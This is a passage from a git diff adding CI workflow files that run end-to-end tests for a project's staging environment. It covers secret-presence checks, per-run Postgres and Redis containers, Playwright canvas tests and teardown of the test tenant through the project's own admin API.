update + install docker.io/jq/awscli/caddy + snap install + # ssm-agent) runs from raw Ubuntu on every boot — none of it is + # pre-baked into the tenant AMI. Empirical fetch_secrets/ok timing + # across today's canaries: 51s → 82s → 143s → 625s. apt-mirror tail + # latency drives the boot-to-fetch_secrets phase from ~1min to >10min. + # A 12min budget leaves only ~2min for the workspace (which needs + # ~3.5min for claude-code cold boot) on slow-apt days, blowing the + # budget. 20min absorbs the worst tenant tail so the workspace probe + # gets the full ~7min it needs even on a slow apt day. Real fix: + # pre-bake caddy + ssm-agent into the tenant AMI (controlplane#TBD). + timeout-minutes: 20 + env: + # claude-code default: cold-start ~5 min (comparable to langgraph), + # but uses MiniMax-M2.7-highspeed via the template's third-party- + # Anthropic-compat path (workspace-configs-templates/claude-code- + # default/config.yaml:64-69). MiniMax is ~5-10x cheaper than + # gpt-4.1-mini per token AND avoids the recurring OpenAI quota- + # exhaustion class that took the canary down 2026-05-03 (#265). + # Operators can pick langgraph / hermes via workflow_dispatch + # when they specifically need to exercise the OpenAI or SDK- + # native paths. + E2E_RUNTIME: ${{ github.event.inputs.runtime || 'claude-code' }} + # Pin the canary to a specific MiniMax model rather than relying + # on the per-runtime default ("sonnet" → routes to direct + # Anthropic, defeats the cost saving). Operators can override + # via workflow_dispatch by setting a different E2E_MODEL_SLUG + # input if they need to exercise a specific model. M2.7-highspeed + # is "Token Plan only" but cheap-per-token and fast. + E2E_MODEL_SLUG: ${{ github.event.inputs.model_slug || 'MiniMax-M2.7-highspeed' }} + # Bound to 10 min so a stuck provision fails the run instead of + # holding up the next cron firing. 15-min default in the script + # is for the on-PR full lifecycle where we have more headroom. + E2E_PROVISION_TIMEOUT_SECS: '600' + # Slug suffix — namespaced "synth-" so these runs are + # distinguishable from PR-driven runs in CP admin. + E2E_RUN_ID: synth-${{ github.run_id }} + # Forced false for cron; respected for manual dispatch + E2E_KEEP_ORG: ${{ github.event.inputs.keep_org == 'true' && '1' || '' }} + MOLECULE_CP_URL: ${{ vars.STAGING_CP_URL || 'https://staging-api.moleculesai.app' }} + MOLECULE_ADMIN_TOKEN: ${{ secrets.CP_STAGING_ADMIN_API_TOKEN }} + # MiniMax key is the canary's PRIMARY auth path. claude-code + # template's `minimax` provider routes ANTHROPIC_BASE_URL to + # api.minimax.io/anthropic and reads MINIMAX_API_KEY at boot. + # tests/e2e/test_staging_full_saas.sh branches SECRETS_JSON on + # which key is present — MiniMax wins when set. + E2E_MINIMAX_API_KEY: ${{ secrets.MOLECULE_STAGING_MINIMAX_API_KEY }} + # Direct-Anthropic alternative for operators who don't want to + # set up a MiniMax account (priority below MiniMax — first + # non-empty wins in test_staging_full_saas.sh's secrets-injection + # block). See #2578 PR comment for the rationale. + E2E_ANTHROPIC_API_KEY: ${{ secrets.MOLECULE_STAGING_ANTHROPIC_API_KEY }} + # OpenAI fallback — kept wired so operators can dispatch with + # E2E_RUNTIME=langgraph or =hermes and still have a working + # canary path. The script picks the right blob shape based on + # which key is non-empty. + E2E_OPENAI_API_KEY: ${{ secrets.MOLECULE_STAGING_OPENAI_KEY }} + steps: + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + + - name: Verify required secrets present + run: | + # Hard-fail on missing secret REGARDLESS of trigger. Previously + # this step soft-skipped on workflow_dispatch via `exit 0`, but + # `exit 0` only ends the STEP — subsequent steps still ran with + # the empty secret, the synth script fell through to the wrong + # SECRETS_JSON branch, and the canary failed 5 min later with a + # confusing "Agent error (Exception)" instead of the clean + # "secret missing" message at the top. Caught 2026-05-04 by + # dispatched run 25296530706: claude-code + missing MINIMAX + # silently used OpenAI keys but kept model=MiniMax-M2.7, then + # the workspace 401'd against MiniMax once it tried to call. + # Fix: exit 1 in both cron and dispatch paths. Operators who + # want to verify a YAML change without setting up the secret + # can read the verify-secrets step's stderr — the failure is + # itself the verification signal. + if [ -z "${MOLECULE_ADMIN_TOKEN:-}" ]; then + echo "::error::CP_STAGING_ADMIN_API_TOKEN secret missing — synth E2E cannot run" + echo "::error::Set it at Settings → Secrets and Variables → Actions; pull from staging-CP's CP_ADMIN_API_TOKEN env in Railway." + exit 1 + fi + + # LLM-key requirement is per-runtime: claude-code accepts + # EITHER MiniMax OR direct-Anthropic (whichever is set first), + # langgraph + hermes use OpenAI (MOLECULE_STAGING_OPENAI_KEY). + case "${E2E_RUNTIME}" in + claude-code) + if [ -n "${E2E_MINIMAX_API_KEY:-}" ]; then + required_secret_name="MOLECULE_STAGING_MINIMAX_API_KEY" + required_secret_value="${E2E_MINIMAX_API_KEY}" + elif [ -n "${E2E_ANTHROPIC_API_KEY:-}" ]; then + required_secret_name="MOLECULE_STAGING_ANTHROPIC_API_KEY" + required_secret_value="${E2E_ANTHROPIC_API_KEY}" + else + required_secret_name="MOLECULE_STAGING_MINIMAX_API_KEY or MOLECULE_STAGING_ANTHROPIC_API_KEY" + required_secret_value="" + fi + ;; + langgraph|hermes) + required_secret_name="MOLECULE_STAGING_OPENAI_KEY" + required_secret_value="${E2E_OPENAI_API_KEY:-}" + ;; + *) + echo "::warning::Unknown E2E_RUNTIME='${E2E_RUNTIME}' — skipping LLM-key check" + required_secret_name="" + required_secret_value="present" + ;; + esac + if [ -n "$required_secret_name" ] && [ -z "$required_secret_value" ]; then + echo "::error::${required_secret_name} secret missing — runtime=${E2E_RUNTIME} cannot authenticate against its LLM provider" + echo "::error::Set it at Settings → Secrets and Variables → Actions, OR dispatch with a different runtime" + exit 1 + fi + + - name: Install required tools + run: | + # The script depends on jq + curl (already on ubuntu-latest) + # and python3 (likewise). Verify they're all present so we + # fail fast on a runner image regression rather than mid-script. + for cmd in jq curl python3; do + command -v "$cmd" >/dev/null 2>&1 || { + echo "::error::required tool '$cmd' not on PATH — runner image regression?" + exit 1 + } + done + + - name: Run synthetic E2E + # The script handles its own teardown via EXIT trap; even on + # failure (timeout, assertion), the org is deprovisioned and + # leaks are reported. Exit code propagates from the script. + run: | + bash tests/e2e/test_staging_full_saas.sh + + - name: Failure summary + # Runs only on failure. Adds a job summary so the workflow run + # page shows a quick "what happened" instead of forcing readers + # to scroll through script output. + if: failure() + run: | + { + echo "## Continuous synth E2E failed" + echo "" + echo "**Run ID:** ${{ github.run_id }}" + echo "**Trigger:** ${{ github.event_name }}" + echo "**Runtime:** ${E2E_RUNTIME}" + echo "**Slug:** synth-${{ github.run_id }}" + echo "" + echo "### What this means" + echo "" + echo "Staging just regressed on a path that previously worked. Likely classes:" + echo "- Schema mismatch between sender and receiver (#2345 class)" + echo "- Deployment-pipeline gap (RFC #2312 / staging-tenant-image-stale class)" + echo "- Vendor outage (Cloudflare, Railway, AWS, GHCR)" + echo "- Staging-CP env var rotation" + echo "" + echo "### Next steps" + echo "" + echo "1. Check the script output above for the assertion that failed" + echo "2. If it's a vendor outage, no action needed — next firing in ~20 min" + echo "3. If it's a code regression, find the causing PR via \`git log\` against last green run and revert/fix" + echo "4. Keep an eye on the next 1-2 firings — flake vs persistent fail differs in priority" + } >> "$GITHUB_STEP_SUMMARY" diff --git a/.gitea/workflows/e2e-api.yml b/.gitea/workflows/e2e-api.yml new file mode 100644 index 00000000..6f82e080 --- /dev/null +++ b/.gitea/workflows/e2e-api.yml @@ -0,0 +1,333 @@ +name: E2E API Smoke Test + +# Ported from .github/workflows/e2e-api.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# +# Extracted from ci.yml so workflow-level concurrency can protect this job +# from run-level cancellation (issue #458). +# +# Trigger model (revised 2026-04-29): +# +# Always FIRES on push/pull_request to staging+main. Real work is gated +# per-step on `needs.detect-changes.outputs.api` — when paths under +# `workspace-server/`, `tests/e2e/`, or this workflow file haven't +# changed, the no-op step alone runs and emits SUCCESS for the +# `E2E API Smoke Test` check, satisfying branch protection without +# spending CI cycles. See the in-job comment on the `e2e-api` job for +# why this is one job (not two-jobs-sharing-name) and the 2026-04-29 +# PR #2264 incident that drove the consolidation. +# +# Parallel-safety (Class B Hongming-owned CICD red sweep, 2026-05-08) +# ------------------------------------------------------------------- +# Same substrate hazard as PR #98 (handlers-postgres-integration). Our +# Gitea act_runner runs with `container.network: host` (operator host +# `/opt/molecule/runners/config.yaml`), which means: +# +# * Two concurrent runs both try to bind their `-p 15432:5432` / +# `-p 16379:6379` host ports — the second postgres/redis FATALs +# with `Address in use` and `docker run` returns exit 125 with +# `Conflict. The container name "/molecule-ci-postgres" is already +# in use by container ...`. Verified in run a7/2727 on 2026-05-07. +# * The fixed container names `molecule-ci-postgres` / `-redis` (the +# pre-fix shape) collide on name AS WELL AS port. The cleanup-with- +# `docker rm -f` at the start of the second job KILLS the first +# job's still-running postgres/redis. +# +# Fix shape (mirrors PR #98's bridge-net pattern, adapted because +# platform-server is a Go binary on the host, not a containerised +# step): +# +# 1. Unique container names per run: +# pg-e2e-api-${RUN_ID}-${RUN_ATTEMPT} +# redis-e2e-api-${RUN_ID}-${RUN_ATTEMPT} +# `${RUN_ID}-${RUN_ATTEMPT}` is unique even across reruns of the +# same run_id. +# 2. Ephemeral host port per run (`-p 0:5432`), then read the actual +# bound port via `docker port` and export DATABASE_URL/REDIS_URL +# pointing at it. No fixed host-port → no port collision. +# 3. `127.0.0.1` (NOT `localhost`) in URLs — IPv6 first-resolve was +# the original flake fixed in #92 and the script's still IPv6- +# enabled. +# 4. `if: always()` cleanup so containers don't leak when test steps +# fail. +# +# Issue #94 items #2 + #3 (also fixed here): +# * Pre-pull `alpine:latest` so the platform-server's provisioner +# (`internal/handlers/container_files.go`) can stand up its +# ephemeral token-write helper without a daemon.io round-trip. +# * Create `molecule-core-net` bridge network if missing so the +# provisioner's container.HostConfig {NetworkMode: ...} attach +# succeeds. +# Item #1 (timeouts) — evidence on recent runs (77/3191, ae/4270, 0e/ +# 2318) shows Postgres ready in 3s, Redis in 1s, Platform in 1s when +# they DO come up. Timeouts are not the bottleneck; not bumped. +# +# Item explicitly NOT fixed here: failing test `Status back online` +# fails because the platform's langgraph workspace template image +# (ghcr.io/molecule-ai/workspace-template-langgraph:latest) returns +# 403 Forbidden post-2026-05-06 GitHub org suspension. That is a +# template-registry resolution issue (ADR-002 / local-build mode) and +# belongs in a separate change that touches workspace-server, not +# this workflow file. + +on: + push: + branches: [main, staging] + pull_request: + branches: [main, staging] +concurrency: + # Per-SHA grouping (changed 2026-04-28 from per-ref). Per-ref had the + # same auto-promote-staging brittleness as e2e-staging-canvas — back- + # to-back staging pushes share refs/heads/staging, so the older push's + # queued run gets cancelled when a newer push lands. Auto-promote- + # staging then sees `completed/cancelled` for the older SHA and stays + # put; the newer SHA's gates may eventually save the day, but if the + # newer push gets cancelled too, we deadlock. + # + # See e2e-staging-canvas.yml's identical concurrency block for the full + # rationale and the 2026-04-28 incident reference. + group: e2e-api-${{ github.event.pull_request.head.sha || github.sha }} + cancel-in-progress: false + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + detect-changes: + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + outputs: + api: ${{ steps.decide.outputs.api }} + steps: + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + fetch-depth: 0 + - id: decide + # Inline replacement for dorny/paths-filter — same pattern PR#372's + # ci.yml port used. Diffs against the PR base or push BEFORE SHA, + # then matches against the api-relevant path set. + run: | + BASE="${GITHUB_BASE_REF:-${{ github.event.before }}}" + if [ "${{ github.event_name }}" = "pull_request" ] && [ -n "${{ github.event.pull_request.base.sha }}" ]; then + BASE="${{ github.event.pull_request.base.sha }}" + fi + if [ -z "$BASE" ] || echo "$BASE" | grep -qE '^0+$'; then + echo "api=true" >> "$GITHUB_OUTPUT" + exit 0 + fi + if ! git cat-file -e "$BASE" 2>/dev/null; then + git fetch --depth=1 origin "$BASE" 2>/dev/null || true + fi + if ! git cat-file -e "$BASE" 2>/dev/null; then + echo "api=true" >> "$GITHUB_OUTPUT" + exit 0 + fi + CHANGED=$(git diff --name-only "$BASE" HEAD) + if echo "$CHANGED" | grep -qE '^(workspace-server/|tests/e2e/|\.gitea/workflows/e2e-api\.yml$)'; then + echo "api=true" >> "$GITHUB_OUTPUT" + else + echo "api=false" >> "$GITHUB_OUTPUT" + fi + + # ONE job (no job-level `if:`) that always runs and reports under the + # required-check name `E2E API Smoke Test`. Real work is gated per-step + # on `needs.detect-changes.outputs.api`. Reason: GitHub registers a + # check run for every job that matches `name:`, and a job-level + # `if: false` produces a SKIPPED check run. Branch protection treats + # all check runs with a matching context name on the latest commit as a + # SET — any SKIPPED in the set fails the required-check eval, even with + # SUCCESS siblings. Verified 2026-04-29 on PR #2264 (staging→main): + # 4 check runs (2 SKIPPED + 2 SUCCESS) at the head SHA blocked + # promotion despite all real work succeeding. Collapsing to a single + # always-running job with conditional steps emits exactly one SUCCESS + # check run regardless of paths filter — branch-protection-clean. + e2e-api: + needs: detect-changes + name: E2E API Smoke Test + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + timeout-minutes: 15 + env: + # Unique per-run container names so concurrent runs on the host- + # network act_runner don't collide on name OR port. + # `${RUN_ID}-${RUN_ATTEMPT}` stays unique across reruns of the + # same run_id. PORT is set later (after docker port lookup) since + # we let Docker assign an ephemeral host port. + PG_CONTAINER: pg-e2e-api-${{ github.run_id }}-${{ github.run_attempt }} + REDIS_CONTAINER: redis-e2e-api-${{ github.run_id }}-${{ github.run_attempt }} + PORT: "8080" + steps: + - name: No-op pass (paths filter excluded this commit) + if: needs.detect-changes.outputs.api != 'true' + run: | + echo "No workspace-server / tests/e2e / workflow changes — E2E API gate satisfied without running tests." + echo "::notice::E2E API Smoke Test no-op pass (paths filter excluded this commit)." + - if: needs.detect-changes.outputs.api == 'true' + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + - if: needs.detect-changes.outputs.api == 'true' + uses: actions/setup-go@40f1582b2485089dde7abd97c1529aa768e1baff # v5 + with: + go-version: 'stable' + cache: true + cache-dependency-path: workspace-server/go.sum + - name: Pre-pull alpine + ensure provisioner network (Issue #94 items #2 + #3) + if: needs.detect-changes.outputs.api == 'true' + run: | + # Provisioner uses alpine:latest for ephemeral token-write + # containers (workspace-server/internal/handlers/container_files.go). + # Pre-pull so the first provision in test_api.sh doesn't race + # the daemon's pull cache. Idempotent — `docker pull` is a no-op + # when the image is already present. + docker pull alpine:latest >/dev/null + # Provisioner attaches workspace containers to + # molecule-core-net (workspace-server/internal/provisioner/ + # provisioner.go::DefaultNetwork). The bridge already exists on + # the operator host's docker daemon — `network create` is + # idempotent via `|| true`. + docker network create molecule-core-net >/dev/null 2>&1 || true + echo "alpine:latest pre-pulled; molecule-core-net ensured." + - name: Start Postgres (docker) + if: needs.detect-changes.outputs.api == 'true' + run: | + # Defensive cleanup — only matches THIS run's container name, + # so it cannot kill a sibling run's postgres. (Pre-fix the + # name was static and this rm hit other runs' containers.) + docker rm -f "$PG_CONTAINER" 2>/dev/null || true + # `-p 0:5432` requests an ephemeral host port; we read it back + # below and export DATABASE_URL. + docker run -d --name "$PG_CONTAINER" \ + -e POSTGRES_USER=dev -e POSTGRES_PASSWORD=dev -e POSTGRES_DB=molecule \ + -p 0:5432 postgres:16 >/dev/null + # Resolve the host-side port assignment. `docker port` prints + # `0.0.0.0:NNNN` (and on host-net runners may also print an + # IPv6 line — take the first IPv4 line). + PG_PORT=$(docker port "$PG_CONTAINER" 5432/tcp | awk -F: '/^0\.0\.0\.0:/ {print $2; exit}') + if [ -z "$PG_PORT" ]; then + # Fallback: any first line. Some Docker versions print only + # one line. + PG_PORT=$(docker port "$PG_CONTAINER" 5432/tcp | head -1 | awk -F: '{print $NF}') + fi + if [ -z "$PG_PORT" ]; then + echo "::error::Could not resolve host port for $PG_CONTAINER" + docker port "$PG_CONTAINER" 5432/tcp || true + docker logs "$PG_CONTAINER" || true + exit 1 + fi + # 127.0.0.1 (NOT localhost) — IPv6 first-resolve flake (#92). + echo "PG_PORT=${PG_PORT}" >> "$GITHUB_ENV" + echo "DATABASE_URL=postgres://dev:dev@127.0.0.1:${PG_PORT}/molecule?sslmode=disable" >> "$GITHUB_ENV" + echo "Postgres host port: ${PG_PORT}" + for i in $(seq 1 30); do + if docker exec "$PG_CONTAINER" pg_isready -U dev >/dev/null 2>&1; then + echo "Postgres ready after ${i}s" + exit 0 + fi + sleep 1 + done + echo "::error::Postgres did not become ready in 30s" + docker logs "$PG_CONTAINER" || true + exit 1 + - name: Start Redis (docker) + if: needs.detect-changes.outputs.api == 'true' + run: | + docker rm -f "$REDIS_CONTAINER" 2>/dev/null || true + docker run -d --name "$REDIS_CONTAINER" -p 0:6379 redis:7 >/dev/null + REDIS_PORT=$(docker port "$REDIS_CONTAINER" 6379/tcp | awk -F: '/^0\.0\.0\.0:/ {print $2; exit}') + if [ -z "$REDIS_PORT" ]; then + REDIS_PORT=$(docker port "$REDIS_CONTAINER" 6379/tcp | head -1 | awk -F: '{print $NF}') + fi + if [ -z "$REDIS_PORT" ]; then + echo "::error::Could not resolve host port for $REDIS_CONTAINER" + docker port "$REDIS_CONTAINER" 6379/tcp || true + docker logs "$REDIS_CONTAINER" || true + exit 1 + fi + echo "REDIS_PORT=${REDIS_PORT}" >> "$GITHUB_ENV" + echo "REDIS_URL=redis://127.0.0.1:${REDIS_PORT}" >> "$GITHUB_ENV" + echo "Redis host port: ${REDIS_PORT}" + for i in $(seq 1 15); do + if docker exec "$REDIS_CONTAINER" redis-cli ping 2>/dev/null | grep -q PONG; then + echo "Redis ready after ${i}s" + exit 0 + fi + sleep 1 + done + echo "::error::Redis did not become ready in 15s" + docker logs "$REDIS_CONTAINER" || true + exit 1 + - name: Build platform + if: needs.detect-changes.outputs.api == 'true' + working-directory: workspace-server + run: go build -o platform-server ./cmd/server + - name: Start platform (background) + if: needs.detect-changes.outputs.api == 'true' + working-directory: workspace-server + run: | + # DATABASE_URL + REDIS_URL exported by the start-postgres / + # start-redis steps point at this run's per-run host ports. + ./platform-server > platform.log 2>&1 & + echo $! > platform.pid + - name: Wait for /health + if: needs.detect-changes.outputs.api == 'true' + run: | + for i in $(seq 1 30); do + if curl -sf http://127.0.0.1:8080/health > /dev/null; then + echo "Platform up after ${i}s" + exit 0 + fi + sleep 1 + done + echo "::error::Platform did not become healthy in 30s" + cat workspace-server/platform.log || true + exit 1 + - name: Assert migrations applied + if: needs.detect-changes.outputs.api == 'true' + run: | + tables=$(docker exec "$PG_CONTAINER" psql -U dev -d molecule -tAc "SELECT count(*) FROM information_schema.tables WHERE table_schema='public' AND table_name='workspaces'") + if [ "$tables" != "1" ]; then + echo "::error::Migrations did not apply" + cat workspace-server/platform.log || true + exit 1 + fi + echo "Migrations OK" + - name: Run E2E API tests + if: needs.detect-changes.outputs.api == 'true' + run: bash tests/e2e/test_api.sh + - name: Run notify-with-attachments E2E + if: needs.detect-changes.outputs.api == 'true' + run: bash tests/e2e/test_notify_attachments_e2e.sh + - name: Run priority-runtimes E2E (claude-code + hermes — skips when keys absent) + if: needs.detect-changes.outputs.api == 'true' + run: bash tests/e2e/test_priority_runtimes_e2e.sh + - name: Run poll-mode + since_id cursor E2E (#2339) + if: needs.detect-changes.outputs.api == 'true' + run: bash tests/e2e/test_poll_mode_e2e.sh + - name: Run poll-mode chat upload E2E (RFC #2891) + if: needs.detect-changes.outputs.api == 'true' + run: bash tests/e2e/test_poll_mode_chat_upload_e2e.sh + - name: Dump platform log on failure + if: failure() && needs.detect-changes.outputs.api == 'true' + run: cat workspace-server/platform.log || true + - name: Stop platform + if: always() && needs.detect-changes.outputs.api == 'true' + run: | + if [ -f workspace-server/platform.pid ]; then + kill "$(cat workspace-server/platform.pid)" 2>/dev/null || true + fi + - name: Stop service containers + # always() so containers don't leak when test steps fail. The + # cleanup is best-effort: if the container is already gone + # (e.g. concurrent rerun race), don't fail the job. + if: always() && needs.detect-changes.outputs.api == 'true' + run: | + docker rm -f "$PG_CONTAINER" 2>/dev/null || true + docker rm -f "$REDIS_CONTAINER" 2>/dev/null || true diff --git a/.gitea/workflows/e2e-staging-canvas.yml b/.gitea/workflows/e2e-staging-canvas.yml new file mode 100644 index 00000000..93eb685e --- /dev/null +++ b/.gitea/workflows/e2e-staging-canvas.yml @@ -0,0 +1,247 @@ +name: E2E Staging Canvas (Playwright) + +# Ported from .github/workflows/e2e-staging-canvas.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# + +# Playwright test suite that provisions a fresh staging org per run and +# verifies every workspace-panel tab renders without crashing. Complements +# e2e-staging-saas.yml (which tests the API shape) by exercising the +# actual browser + canvas bundle against live staging. +# +# Triggers: push to main/staging or PR touching canvas sources + this workflow, +# manual dispatch, and weekly cron to catch browser/runtime drift even +# when canvas is quiet. +# Added staging to push/pull_request branches so the auto-promote gate +# check (--event push --branch staging) can see a completed run for this +# workflow — mirrors what PR #1891 does for e2e-api.yml. + +on: + # Trigger model (revised 2026-04-29): + # + # Always fires on push/pull_request; real work is gated per-step on + # `needs.detect-changes.outputs.canvas`. When canvas/ paths haven't + # changed, the no-op step alone runs and emits SUCCESS for the + # `Canvas tabs E2E` check, satisfying branch protection without + # spending CI cycles. See e2e-api.yml for the rationale on why this + # is a single job rather than two-jobs-sharing-name. + push: + branches: [main] + pull_request: + branches: [main] + schedule: + # Weekly on Sunday 08:00 UTC — catches Chrome / Playwright / Next.js + # release-note-shaped regressions that don't ride in with a PR. + - cron: '0 8 * * 0' + +concurrency: + # Per-SHA grouping (changed 2026-04-28 from a single global group). The + # global group made auto-promote-staging brittle: when a staging push + # queued behind an in-flight run and a third entrant (a PR run, a + # follow-on push) entered the group, the staging push got cancelled — + # leaving auto-promote-staging looking at `completed/cancelled` for a + # required gate and refusing to advance main. Observed 2026-04-28 + # 23:51-23:53 on staging tip 3f99fede. + # + # The original intent of the global group was to throttle parallel + # E2E provisions (each spins a fresh EC2). At our scale that throttle + # isn't worth the correctness cost — fresh-org-per-run isolates the + # state, and the cost of two parallel runs (~$0.001/min × 10min × 2) + # is rounding error vs. the cost of a stuck pipeline. + # + # Per-SHA still dedupes accidental double-triggers for the SAME SHA. + # It does NOT cancel obsolete-PR-version runs on force-push; that + # wasted CI is acceptable given the alternative is losing staging-tip + # data that auto-promote-staging needs. + group: e2e-staging-canvas-${{ github.event.pull_request.head.sha || github.sha }} + cancel-in-progress: false + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + detect-changes: + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + outputs: + canvas: ${{ steps.decide.outputs.canvas }} + steps: + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + fetch-depth: 0 + - id: decide + # Inline replacement for dorny/paths-filter — see e2e-api.yml. + # Cron triggers always run real work (no diff context). + run: | + if [ "${{ github.event_name }}" = "schedule" ]; then + echo "canvas=true" >> "$GITHUB_OUTPUT" + exit 0 + fi + BASE="${GITHUB_BASE_REF:-${{ github.event.before }}}" + if [ "${{ github.event_name }}" = "pull_request" ] && [ -n "${{ github.event.pull_request.base.sha }}" ]; then + BASE="${{ github.event.pull_request.base.sha }}" + fi + if [ -z "$BASE" ] || echo "$BASE" | grep -qE '^0+$'; then + echo "canvas=true" >> "$GITHUB_OUTPUT" + exit 0 + fi + if ! git cat-file -e "$BASE" 2>/dev/null; then + git fetch --depth=1 origin "$BASE" 2>/dev/null || true + fi + if ! git cat-file -e "$BASE" 2>/dev/null; then + echo "canvas=true" >> "$GITHUB_OUTPUT" + exit 0 + fi + CHANGED=$(git diff --name-only "$BASE" HEAD) + if echo "$CHANGED" | grep -qE '^(canvas/|\.gitea/workflows/e2e-staging-canvas\.yml$)'; then + echo "canvas=true" >> "$GITHUB_OUTPUT" + else + echo "canvas=false" >> "$GITHUB_OUTPUT" + fi + + # ONE job (no job-level `if:`) that always runs and reports under the + # required-check name `Canvas tabs E2E`. Real work is gated per-step on + # `needs.detect-changes.outputs.canvas`. See e2e-api.yml for the full + # rationale — same path-filter check-name parity issue blocked PR #2264 + # (staging→main) on 2026-04-29 because branch protection treats matching- + # name check runs as a SET, and any SKIPPED member fails the eval. + playwright: + needs: detect-changes + name: Canvas tabs E2E + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + timeout-minutes: 40 + + env: + CANVAS_E2E_STAGING: '1' + MOLECULE_CP_URL: https://staging-api.moleculesai.app + MOLECULE_ADMIN_TOKEN: ${{ secrets.MOLECULE_STAGING_ADMIN_TOKEN }} + + defaults: + run: + working-directory: canvas + + steps: + - name: No-op pass (paths filter excluded this commit) + if: needs.detect-changes.outputs.canvas != 'true' + working-directory: . + run: | + echo "No canvas / workflow changes — E2E Staging Canvas gate satisfied without running tests." + echo "::notice::E2E Staging Canvas no-op pass (paths filter excluded this commit)." + + - if: needs.detect-changes.outputs.canvas == 'true' + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + + - name: Verify admin token present + if: needs.detect-changes.outputs.canvas == 'true' + run: | + if [ -z "$MOLECULE_ADMIN_TOKEN" ]; then + echo "::error::Missing MOLECULE_STAGING_ADMIN_TOKEN" + exit 2 + fi + + - name: Set up Node + if: needs.detect-changes.outputs.canvas == 'true' + uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6.4.0 + with: + node-version: '20' + cache: 'npm' + cache-dependency-path: canvas/package-lock.json + + - name: Install canvas deps + if: needs.detect-changes.outputs.canvas == 'true' + run: npm ci + + - name: Install Playwright browsers + if: needs.detect-changes.outputs.canvas == 'true' + run: npx playwright install --with-deps chromium + + - name: Run staging canvas E2E + if: needs.detect-changes.outputs.canvas == 'true' + run: npx playwright test --config=playwright.staging.config.ts + + - name: Upload Playwright report on failure + if: failure() && needs.detect-changes.outputs.canvas == 'true' + # Pinned to v3 for Gitea act_runner v0.6 compatibility — v4+ uses + # the GHES 3.10+ artifact protocol that Gitea 1.22.x does NOT + # implement (see ci.yml upload step for the canonical error + # cite). Drop this pin when Gitea ships the v4 protocol. + uses: actions/upload-artifact@c6a366c94c3e0affe28c06c8df20a878f24da3cf # v3.2.2 + with: + name: playwright-report-staging + path: canvas/playwright-report-staging/ + retention-days: 14 + + - name: Upload screenshots on failure + if: failure() && needs.detect-changes.outputs.canvas == 'true' + # Pinned to v3 for Gitea act_runner v0.6 compatibility (see above). + uses: actions/upload-artifact@c6a366c94c3e0affe28c06c8df20a878f24da3cf # v3.2.2 + with: + name: playwright-screenshots + path: canvas/test-results/ + retention-days: 14 + + # Safety-net teardown — fires only when Playwright's globalTeardown + # didn't (worker crash, runner cancel). Reads the slug from + # canvas/.playwright-staging-state.json (written by staging-setup + # as its first action, before any CP call) and deletes only that + # slug. + # + # Earlier versions of this step pattern-swept `e2e-canvas--*` + # orgs to compensate for setup-crash-before-state-file-write. That + # over-aggressive cleanup raced concurrent canvas-E2E runs and + # poisoned each other's tenants — observed 2026-04-30 when three + # real-test runs killed each other mid-test, surfacing as + # `getaddrinfo ENOTFOUND` once CP had cleaned up the just-deleted + # DNS record. Pattern-sweep removed; setup now writes the state + # file before any CP work, so the slug is always recoverable. + - name: Teardown safety net + if: always() && needs.detect-changes.outputs.canvas == 'true' + env: + ADMIN_TOKEN: ${{ secrets.MOLECULE_STAGING_ADMIN_TOKEN }} + run: | + set +e + STATE_FILE=".playwright-staging-state.json" + if [ ! -f "$STATE_FILE" ]; then + echo "::notice::No state file at canvas/$STATE_FILE — Playwright globalTeardown handled it (or setup never ran)." + exit 0 + fi + slug=$(python3 -c "import json; print(json.load(open('$STATE_FILE')).get('slug',''))") + if [ -z "$slug" ]; then + echo "::warning::State file present but slug missing; nothing to clean up." + exit 0 + fi + echo "Deleting orphan tenant: $slug" + # Verify HTTP 2xx instead of `>/dev/null || true` swallowing + # failures. A 5xx or timeout previously looked identical to + # success, leaving the tenant alive for up to ~45 min until + # sweep-stale-e2e-orgs caught it. Surface failures as + # workflow warnings naming the slug. Don't `exit 1` — a single + # cleanup miss shouldn't fail-flag the canvas test when the + # actual smoke check passed; the sweeper is the safety net. + # See molecule-controlplane#420. + # Tempfile-routed -w + set +e/-e prevents curl-exit-code + # pollution of the captured status (lint-curl-status-capture.yml). + set +e + curl -sS -o /tmp/canvas-cleanup.out -w "%{http_code}" \ + -X DELETE "$MOLECULE_CP_URL/cp/admin/tenants/$slug" \ + -H "Authorization: Bearer $ADMIN_TOKEN" \ + -H "Content-Type: application/json" \ + -d "{\"confirm\":\"$slug\"}" >/tmp/canvas-cleanup.code + set -e + code=$(cat /tmp/canvas-cleanup.code 2>/dev/null || echo "000") + if [ "$code" = "200" ] || [ "$code" = "204" ]; then + echo "[teardown] deleted $slug (HTTP $code)" + else + echo "::warning::canvas teardown for $slug returned HTTP $code — sweep-stale-e2e-orgs 